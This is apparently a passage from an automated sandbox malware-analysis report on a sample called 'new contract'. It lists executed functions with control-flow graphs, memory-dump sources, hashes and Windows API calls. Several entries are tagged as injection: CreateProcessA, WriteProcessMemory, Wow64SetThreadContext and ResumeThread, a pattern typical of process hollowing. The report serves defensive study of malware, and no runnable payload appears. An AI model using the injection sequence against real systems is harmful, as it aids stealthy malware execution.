24211->24204 24212->24211 24214 14bd690 DuplicateHandle 24213->24214 24215 14bd656 24214->24215 24215->24204

                                                                                                                                                                            Executed Functions

                                                                                                                                                                            Function 077B07B0 Relevance: 6.9, Strings: 5, Instructions: 619COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 294 77b07b0-77b2ae8 297 77b2fcb-77b3034 294->297 298 77b2aee-77b2af3 294->298 304 77b303b-77b30c3 297->304 298->297 299 77b2af9-77b2b16 298->299 299->304 305 77b2b1c-77b2b20 299->305 349 77b30ce-77b314e 304->349 307 77b2b2f-77b2b33 305->307 308 77b2b22-77b2b2c call 77b07c0 305->308 310 77b2b42-77b2b49 307->310 311 77b2b35-77b2b3f call 77b07c0 307->311 308->307 316 77b2b4f-77b2b7f 310->316 317 77b2c64-77b2c69 310->317 311->310 327 77b334e-77b3374 316->327 330 77b2b85-77b2c58 call 77b07cc * 2 316->330 320 77b2c6b-77b2c6f 317->320 321 77b2c71-77b2c76 317->321 320->321 323 77b2c78-77b2c7c 320->323 324 77b2c88-77b2cb8 call 77b07d8 * 3 321->324 323->327 328 77b2c82-77b2c85 323->328 324->349 350 77b2cbe-77b2cc1 324->350 338 77b3376-77b3382 327->338 339 77b3384 327->339 328->324 330->317 358 77b2c5a 330->358 344 77b3387-77b338c 338->344 339->344 366 77b3155-77b31d7 349->366 350->349 353 77b2cc7-77b2cc9 350->353 353->349 354 77b2ccf-77b2d04 353->354 365 77b2d0a-77b2d13 354->365 354->366 358->317 368 77b2d19-77b2d73 call 77b07d8 * 2 call 77b07e8 * 2 365->368 369 77b2e76-77b2e7a 365->369 371 77b31df-77b3261 366->371 411 77b2d85 368->411 412 77b2d75-77b2d7e 368->412 369->371 372 77b2e80-77b2e84 369->372 376 77b3269-77b3296 371->376 375 77b2e8a-77b2e90 372->375 372->376 380 77b2e92 375->380 381 77b2e94-77b2ec9 375->381 389 77b329d-77b331d 376->389 385 77b2ed0-77b2ed6 380->385 381->385 385->389 390 77b2edc-77b2ee4 385->390 445 77b3324-77b3346 389->445 394 77b2eeb-77b2eed 390->394 395 77b2ee6-77b2eea 390->395 402 77b2f4f-77b2f55 394->402 403 77b2eef-77b2f13 394->403 395->394 406 77b2f57-77b2f72 402->406 407 77b2f74-77b2fa2 402->407 433 77b2f1c-77b2f20 403->433 434 77b2f15-77b2f1a 403->434 426 77b2faa-77b2fb6 406->426 407->426 417 77b2d89-77b2d8b 411->417 412->417 418 77b2d80-77b2d83 412->418 424 77b2d8d 417->424 425 77b2d92-77b2d96 417->425 418->417 424->425 430 77b2d98-77b2d9f 425->430 431 77b2da4-77b2daa 425->431 444 77b2fbc-77b2fc8 426->444 426->445 440 77b2e41-77b2e45 430->440 441 77b2dac-77b2db2 431->441 442 77b2db4-77b2db9 431->442 433->327 437 77b2f26-77b2f29 433->437 435 77b2f2c-77b2f3d 434->435 454 77b2f45-77b2f4d 435->454 437->435 446 77b2e47-77b2e61 440->446 447 77b2e64-77b2e70 440->447 448 77b2dbf-77b2dc5 441->448 442->448 445->327 446->447 447->368 447->369 451 77b2dcb-77b2dd0 448->451 452 77b2dc7-77b2dc9 448->452 458 77b2dd2-77b2de4 451->458 452->458 454->426 463 77b2dee-77b2df3 458->463 464 77b2de6-77b2dec 458->464 466 77b2df9-77b2e00 463->466 464->466 470 77b2e02-77b2e04 466->470 471 77b2e06 466->471 474 77b2e0b-77b2e16 470->474 471->474 476 77b2e3a 474->476 477 77b2e18-77b2e1b 474->477 476->440 477->440 478 77b2e1d-77b2e23 477->478 479 77b2e2a-77b2e33 478->479 480 77b2e25-77b2e28 478->480 479->440 482 77b2e35-77b2e38 479->482 480->476 480->479 482->440 482->476
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1744265645.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1744229333.00000000077A0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_77a0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Hhq$Hhq$Hhq$Hhq$Hhq
                                                                                                                                                                            • API String ID: 0-1427472961
                                                                                                                                                                            • Opcode ID: e131e39d1af2b066d29790edb30303ebbc14c30bd3e4eba93ff5e6fe9376b372
                                                                                                                                                                            • Instruction ID: 7e542466bdfe7128bac1eed36d4b1e8eaebaeee7fb37609e1bf54202935ddcdf
                                                                                                                                                                            • Opcode Fuzzy Hash: e131e39d1af2b066d29790edb30303ebbc14c30bd3e4eba93ff5e6fe9376b372
                                                                                                                                                                            • Instruction Fuzzy Hash: 7D3281B0A102188FDB64DFA9C8547AEBBF2BF84340F14856AD109AB395DF349D85CF91
                                                                                                                                                                            Function 07988348 Relevance: 1.9, Strings: 1, Instructions: 613COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 573 7988348-798836a 574 798871a-798871f 573->574 575 7988370-79883ab call 7987bd8 call 7987be8 call 7987f38 573->575 576 7988729-798872c 574->576 577 7988721-7988723 574->577 587 79883ad-79883b7 575->587 588 79883be-79883de 575->588 580 7988734-798873c 576->580 577->576 582 7988742-7988749 580->582 587->588 590 79883e0-79883ea 588->590 591 79883f1-7988411 588->591 590->591 593 7988413-798841d 591->593 594 7988424-7988444 591->594 593->594 596 7988446-7988450 594->596 597 7988457-7988460 call 7987f48 594->597 596->597 600 7988462-798847d call 7987f48 597->600 601 7988484-798848d call 7987f58 597->601 600->601 606 798848f-79884aa call 7987f58 601->606 607 79884b1-79884ba call 7987f68 601->607 606->607 613 79884bc-79884c0 call 7987f78 607->613 614 79884c5-79884e1 607->614 613->614 618 79884f9-79884fd 614->618 619 79884e3-79884e9 614->619 622 79884ff-7988510 call 7987f88 618->622 623 7988517-798855f 618->623 620 79884eb 619->620 621 79884ed-79884ef 619->621 620->618 621->618 622->623 629 7988561 623->629 630 7988583-798858a 623->630 633 7988564-798856a 629->633 631 798858c-798859b 630->631 632 79885a1-79885af call 7987f98 630->632 631->632 642 79885b9-79885e3 632->642 643 79885b1-79885b3 632->643 635 798874a-7988789 633->635 636 7988570-7988576 633->636 644 79887e8-79887f8 635->644 645 798878b-79887ac 635->645 637 7988578-798857a 636->637 638 7988580-7988581 636->638 637->638 638->630 638->633 655 7988610-798862c 642->655 656 79885e5-79885f3 642->656 643->642 650 79889ce-79889d5 644->650 651 79887fe-7988808 644->651 645->644 649 79887ae-79887b4 645->649 657 79887c2-79887c7 649->657 658 79887b6-79887b8 649->658 659 79889e4-79889f7 650->659 660 79889d7-79889df call 79845bc 650->660 653 798880a-7988811 651->653 654 7988812-798881c 651->654 661 7988a01-7988a94 654->661 662 7988822-7988862 654->662 671 798862e-7988638 655->671 672 798863f-7988666 call 7987fa8 655->672 656->655 669 79885f5-7988609 656->669 664 79887c9-79887cd 657->664 665 79887d4-79887e1 657->665 658->657 660->659 721 7988aa5-7988aba 661->721 722 7988a96-7988aa2 661->722 690 798887a-798887e 662->690 691 7988864-798886a 662->691 664->665 665->644 669->655 671->672 682 7988668-798866e 672->682 683 798867e-7988682 672->683 684 7988670 682->684 685 7988672-7988674 682->685 687 798869d-79886b9 683->687 688 7988684-7988696 683->688 684->683 685->683 700 79886bb-79886c1 687->700 701 79886d1-79886d5 687->701 688->687 692 79888ab-79888c3 call 79880bc 690->692 693 7988880-79888a5 690->693 697 798886c 691->697 698 798886e-7988870 691->698 714 79888d0-79888d8 692->714 715 79888c5-79888ca 692->715 693->692 697->690 698->690 705 79886c3 700->705 706 79886c5-79886c7 700->706 701->582 707 79886d7-79886e5 701->707 705->701 706->701 712 79886f7-79886fb 707->712 713 79886e7-79886f5 707->713 720 7988701-7988719 712->720 713->712 713->720 716 79888da-79888e8 714->716 717 79888ee-798890d 714->717 715->714 716->717 726 798890f-7988915 717->726 727 7988925-7988929 717->727 730 7988abb 721->730 722->721 731 7988919-798891b 726->731 732 7988917 726->732 733 798892b-7988938 727->733 734 7988982-79889cb 727->734 730->730 731->727 732->727 738 798893a-798896c 733->738 739 798896e-798897b 733->739 734->650 738->739 739->734
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: I
                                                                                                                                                                            • API String ID: 0-3707901625
                                                                                                                                                                            • Opcode ID: 2d8af62de57a5b3ffd6f4d3ea970e86def40f1b3dbe5938d1d33b49fdf1a4766
                                                                                                                                                                            • Instruction ID: a9d1414db003d62f1f88b6f7b6eeca323b589fbdc48a0cba1eb9f06311d7f26c
                                                                                                                                                                            • Opcode Fuzzy Hash: 2d8af62de57a5b3ffd6f4d3ea970e86def40f1b3dbe5938d1d33b49fdf1a4766
                                                                                                                                                                            • Instruction Fuzzy Hash: B9329DB57112059FDB54EB69C490BAEB7FAAF88304F6444ADE106DB3A0CB35ED01CB61
                                                                                                                                                                            Function 07984370 Relevance: 3.1, APIs: 2, Instructions: 92threadCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 555 7984370-7984375 556 7984318-7984337 ResumeThread 555->556 557 7984377-79843c3 555->557 559 7984339-798433f 556->559 560 7984340-7984365 556->560 564 79843d3-7984403 Wow64SetThreadContext 557->564 565 79843c5-79843d1 557->565 559->560 568 798440c-798443c 564->568 569 7984405-798440b 564->569 565->564 569->568
                                                                                                                                                                            APIs
                                                                                                                                                                            • ResumeThread.KERNELBASE ref: 0798432A
                                                                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 079843F6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Thread$ContextResumeWow64
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1826235168-0
                                                                                                                                                                            • Opcode ID: 5d2209b4a1d51620e82ba7303916c24b0f56a84318d65155f784edb3fbb57e1e
                                                                                                                                                                            • Instruction ID: a209eda0af6a440c3668982e278596d36b38a12c745d161f4760c3b08c122045
                                                                                                                                                                            • Opcode Fuzzy Hash: 5d2209b4a1d51620e82ba7303916c24b0f56a84318d65155f784edb3fbb57e1e
                                                                                                                                                                            • Instruction Fuzzy Hash: 5D3188B19003498FDB10EFAAC8857EEBBF4EF48324F14842AD459A7251C7789945CFA1
                                                                                                                                                                            Function 07984B8D Relevance: 1.8, APIs: 1, Instructions: 277processCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 747 7984b8d-7984b95 748 7984b38-7984b52 747->748 749 7984b97-7984c2d 747->749 757 7984b5b-7984b80 748->757 758 7984b54-7984b5a 748->758 753 7984c2f-7984c39 749->753 754 7984c66-7984c86 749->754 753->754 756 7984c3b-7984c3d 753->756 766 7984c88-7984c92 754->766 767 7984cbf-7984cee 754->767 759 7984c3f-7984c49 756->759 760 7984c60-7984c63 756->760 758->757 762 7984c4b 759->762 763 7984c4d-7984c5c 759->763 760->754 762->763 763->763 769 7984c5e 763->769 766->767 768 7984c94-7984c96 766->768 776 7984cf0-7984cfa 767->776 777 7984d27-7984de1 CreateProcessA 767->777 770 7984c98-7984ca2 768->770 771 7984cb9-7984cbc 768->771 769->760 774 7984ca4 770->774 775 7984ca6-7984cb5 770->775 771->767 774->775 775->775 778 7984cb7 775->778 776->777 779 7984cfc-7984cfe 776->779 788 7984dea-7984e70 777->788 789 7984de3-7984de9 777->789 778->771 781 7984d00-7984d0a 779->781 782 7984d21-7984d24 779->782 783 7984d0c 781->783 784 7984d0e-7984d1d 781->784 782->777 783->784 784->784 786 7984d1f 784->786 786->782 799 7984e80-7984e84 788->799 800 7984e72-7984e76 788->800 789->788 802 7984e94-7984e98 799->802 803 7984e86-7984e8a 799->803 800->799 801 7984e78 800->801 801->799 805 7984ea8-7984eac 802->805 806 7984e9a-7984e9e 802->806 803->802 804 7984e8c 803->804 804->802 808 7984ebe-7984ec5 805->808 809 7984eae-7984eb4 805->809 806->805 807 7984ea0 806->807 807->805 810 7984edc 808->810 811 7984ec7-7984ed6 808->811 809->808 813 7984edd 810->813 811->810 813->813
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07984DCE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 963392458-0
                                                                                                                                                                            • Opcode ID: e9785259361077a66c4b1bb5fe1fd68cec7d591c89f43a60cf3244fbce643221
                                                                                                                                                                            • Instruction ID: d9dab88b97d767aca6fb81fcca4c35ae730926860366c1686da729b743720c6a
                                                                                                                                                                            • Opcode Fuzzy Hash: e9785259361077a66c4b1bb5fe1fd68cec7d591c89f43a60cf3244fbce643221
                                                                                                                                                                            • Instruction Fuzzy Hash: 12A16CB1D0025ACFDB50EFA8C840BDDBBB6BF48314F14856AD849A7260DB749985CF91
                                                                                                                                                                            Function 07984B98 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 814 7984b98-7984c2d 816 7984c2f-7984c39 814->816 817 7984c66-7984c86 814->817 816->817 818 7984c3b-7984c3d 816->818 824 7984c88-7984c92 817->824 825 7984cbf-7984cee 817->825 819 7984c3f-7984c49 818->819 820 7984c60-7984c63 818->820 822 7984c4b 819->822 823 7984c4d-7984c5c 819->823 820->817 822->823 823->823 827 7984c5e 823->827 824->825 826 7984c94-7984c96 824->826 833 7984cf0-7984cfa 825->833 834 7984d27-7984de1 CreateProcessA 825->834 828 7984c98-7984ca2 826->828 829 7984cb9-7984cbc 826->829 827->820 831 7984ca4 828->831 832 7984ca6-7984cb5 828->832 829->825 831->832 832->832 835 7984cb7 832->835 833->834 836 7984cfc-7984cfe 833->836 845 7984dea-7984e70 834->845 846 7984de3-7984de9 834->846 835->829 838 7984d00-7984d0a 836->838 839 7984d21-7984d24 836->839 840 7984d0c 838->840 841 7984d0e-7984d1d 838->841 839->834 840->841 841->841 843 7984d1f 841->843 843->839 856 7984e80-7984e84 845->856 857 7984e72-7984e76 845->857 846->845 859 7984e94-7984e98 856->859 860 7984e86-7984e8a 856->860 857->856 858 7984e78 857->858 858->856 862 7984ea8-7984eac 859->862 863 7984e9a-7984e9e 859->863 860->859 861 7984e8c 860->861 861->859 865 7984ebe-7984ec5 862->865 866 7984eae-7984eb4 862->866 863->862 864 7984ea0 863->864 864->862 867 7984edc 865->867 868 7984ec7-7984ed6 865->868 866->865 870 7984edd 867->870 868->867 870->870
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07984DCE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 963392458-0
                                                                                                                                                                            • Opcode ID: 4d3d90270505a6f5fbb7ad7001837146842c554b966fcf1b0a37e911d9c4ab29
                                                                                                                                                                            • Instruction ID: 3ec5e7e47735183f0454f6530fdcc6a75319f4dc92ed77581c8cdc2d3f1015e4
                                                                                                                                                                            • Opcode Fuzzy Hash: 4d3d90270505a6f5fbb7ad7001837146842c554b966fcf1b0a37e911d9c4ab29
                                                                                                                                                                            • Instruction Fuzzy Hash: 89915BB1D0025ACFDF54DF68C840BEDBBB6BF48314F1485AAD809A7260DB749985CF91
                                                                                                                                                                            Function 014BADA8 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 871 14bada8-14badb7 872 14badb9-14badc6 call 14ba0cc 871->872 873 14bade3-14bade7 871->873 879 14badc8 872->879 880 14baddc 872->880 875 14badfb-14bae3c 873->875 876 14bade9-14badf3 873->876 882 14bae49-14bae57 875->882 883 14bae3e-14bae46 875->883 876->875 926 14badce call 14bb040 879->926 927 14badce call 14bb030 879->927 880->873 884 14bae7b-14bae7d 882->884 885 14bae59-14bae5e 882->885 883->882 890 14bae80-14bae87 884->890 887 14bae69 885->887 888 14bae60-14bae67 call 14ba0d8 885->888 886 14badd4-14badd6 886->880 889 14baf18-14bafd8 886->889 892 14bae6b-14bae79 887->892 888->892 921 14bafda-14bafdd 889->921 922 14bafe0-14bb00b GetModuleHandleW 889->922 893 14bae89-14bae91 890->893 894 14bae94-14bae9b 890->894 892->890 893->894 897 14baea8-14baeaa call 14ba0e8 894->897 898 14bae9d-14baea5 894->898 900 14baeaf-14baeb1 897->900 898->897 902 14baebe-14baec3 900->902 903 14baeb3-14baebb 900->903 904 14baee1-14baeee 902->904 905 14baec5-14baecc 902->905 903->902 912 14baf11-14baf17 904->912 913 14baef0-14baf0e 904->913 905->904 907 14baece-14baede call 14ba0f8 call 14ba108 905->907 907->904 913->912 921->922 923 14bb00d-14bb013 922->923 924 14bb014-14bb028 922->924 923->924 926->886 927->886
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 014BAFFE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1740410536.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_14b0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: HandleModule
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                                                            • Opcode ID: 00b1c6e31183f896d252711daa031ad5ac39fa41c7ea71b20d35b5b67a48e55e
                                                                                                                                                                            • Instruction ID: 02648befb9262ea1296581e062b6f123600a2f43bd0a071e14ae8cbdb857ecae
                                                                                                                                                                            • Opcode Fuzzy Hash: 00b1c6e31183f896d252711daa031ad5ac39fa41c7ea71b20d35b5b67a48e55e
                                                                                                                                                                            • Instruction Fuzzy Hash: A87127B0A10B058FD724DF29D49479ABBF1FF88214F10892ED58AD7B50D735E949CBA0
                                                                                                                                                                            Function 014B44B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 928 14b44b4-14b59d9 CreateActCtxA 931 14b59db-14b59e1 928->931 932 14b59e2-14b5a3c 928->932 931->932 939 14b5a4b-14b5a4f 932->939 940 14b5a3e-14b5a41 932->940 941 14b5a51-14b5a5d 939->941 942 14b5a60 939->942 940->939 941->942 944 14b5a61 942->944 944->944
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 014B59C9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1740410536.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_14b0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Create
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                                                            • Opcode ID: 1d44575ae3ca704e7ca5e3c78c9d18c2571a0d9f4e25610040020fb807d3ad25
                                                                                                                                                                            • Instruction ID: 84eea424b7c193807bd9f64757691b898f37dcde920021fd66c1d1c36881ba2a
                                                                                                                                                                            • Opcode Fuzzy Hash: 1d44575ae3ca704e7ca5e3c78c9d18c2571a0d9f4e25610040020fb807d3ad25
                                                                                                                                                                            • Instruction Fuzzy Hash: EF41B3B0C0071DCBDB24DFA9C884ADEFBB6BF49314F20806AD519AB251DB756949CF90
                                                                                                                                                                            Function 014B590C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 945 14b590c-14b59d9 CreateActCtxA 947 14b59db-14b59e1 945->947 948 14b59e2-14b5a3c 945->948 947->948 955 14b5a4b-14b5a4f 948->955 956 14b5a3e-14b5a41 948->956 957 14b5a51-14b5a5d 955->957 958 14b5a60 955->958 956->955 957->958 960 14b5a61 958->960 960->960
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 014B59C9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1740410536.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_14b0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Create
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                                                            • Opcode ID: 88ce914626f28cae7717882a6261e088e78e4d05ebdd1acc4b144c61f855d349
                                                                                                                                                                            • Instruction ID: 238887846e70104dcdf2d8f73a17811a8701ab3c4988c43750ce781c156710c6
                                                                                                                                                                            • Opcode Fuzzy Hash: 88ce914626f28cae7717882a6261e088e78e4d05ebdd1acc4b144c61f855d349
                                                                                                                                                                            • Instruction Fuzzy Hash: AE41D2B0C00719CBDB24CFA9C884BDEFBB2BF49314F20806AD509AB255DB75694ACF50
                                                                                                                                                                            Function 07986EF8 Relevance: 1.6, APIs: 1, Instructions: 84windowCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 961 7986ef8-7986efd 962 7986eff-7986f6a PostMessageW 961->962 963 7986ea0 961->963 967 7986f6c-7986f72 962->967 968 7986f73-7986f87 962->968 965 7986eae-7986eaf 963->965 966 7986ea2-7986ead 963->966 969 7986ebd-7986ecf 965->969 970 7986eb1-7986eb7 965->970 966->965 967->968 973 7986ed8-7986eec 969->973 974 7986ed1-7986ed7 969->974 970->969 974->973
                                                                                                                                                                            APIs
                                                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 07986F5D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessagePost
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 410705778-0
                                                                                                                                                                            • Opcode ID: 968571a6d03cfaca989bab1ffc7b6b1fcc3acd86394c5e4548507324ef68fb72
                                                                                                                                                                            • Instruction ID: 6fc5b2a4babd1ec7918b6f49ebce9aa7f14dfc5c1e906e1feb8426d8e12dbff8
                                                                                                                                                                            • Opcode Fuzzy Hash: 968571a6d03cfaca989bab1ffc7b6b1fcc3acd86394c5e4548507324ef68fb72
                                                                                                                                                                            • Instruction Fuzzy Hash: E13169B68003499FDB10EF99D849BDEFFF8EB48324F10844AD559A7252C375A544CFA1
                                                                                                                                                                            Function 07984909 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 976 7984909-798495e 979 798496e-79849ad WriteProcessMemory 976->979 980 7984960-798496c 976->980 983 79849af-79849b5 979->983 984 79849b6-79849e6 979->984 980->979 983->984
                                                                                                                                                                            APIs
                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 079849A0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3559483778-0
                                                                                                                                                                            • Opcode ID: ee372c363018e1a1bd2326db7235080b2a52eae704ad655d794776cede4a816c
                                                                                                                                                                            • Instruction ID: b6871cfcb590cac6fd54153ffcb254f0314e52983877563244d482ad0b7ad564
                                                                                                                                                                            • Opcode Fuzzy Hash: ee372c363018e1a1bd2326db7235080b2a52eae704ad655d794776cede4a816c
                                                                                                                                                                            • Instruction Fuzzy Hash: 102157B590035A9FCB10DFA9C884BDEBBF5FF48314F14842AE959A7250C779A944CF60
                                                                                                                                                                            Function 07984910 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 988 7984910-798495e 990 798496e-79849ad WriteProcessMemory 988->990 991 7984960-798496c 988->991 994 79849af-79849b5 990->994 995 79849b6-79849e6 990->995 991->990 994->995
                                                                                                                                                                            APIs
                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 079849A0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3559483778-0
                                                                                                                                                                            • Opcode ID: 762111bf8c7277861de63e095f17ef917c92a78fea69227e0bce4be8a82c7518
                                                                                                                                                                            • Instruction ID: d1faa3ba1a19c2c97ff206852a840d78e0a6285837d7368603c84d13da670d85
                                                                                                                                                                            • Opcode Fuzzy Hash: 762111bf8c7277861de63e095f17ef917c92a78fea69227e0bce4be8a82c7518
                                                                                                                                                                            • Instruction Fuzzy Hash: 192157B59003599FCF10DFAAC885BDEBBF5FF88314F10842AE959A7250C7789944CBA0
                                                                                                                                                                            Function 079849F8 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 999 79849f8-7984a8d ReadProcessMemory 1003 7984a8f-7984a95 999->1003 1004 7984a96-7984ac6 999->1004 1003->1004
                                                                                                                                                                            APIs
                                                                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07984A80
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MemoryProcessRead
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1726664587-0
                                                                                                                                                                            • Opcode ID: 706aaab9f8621e5d74309542eef7eca45196ef413c19f3a06e52f19109b73cf4
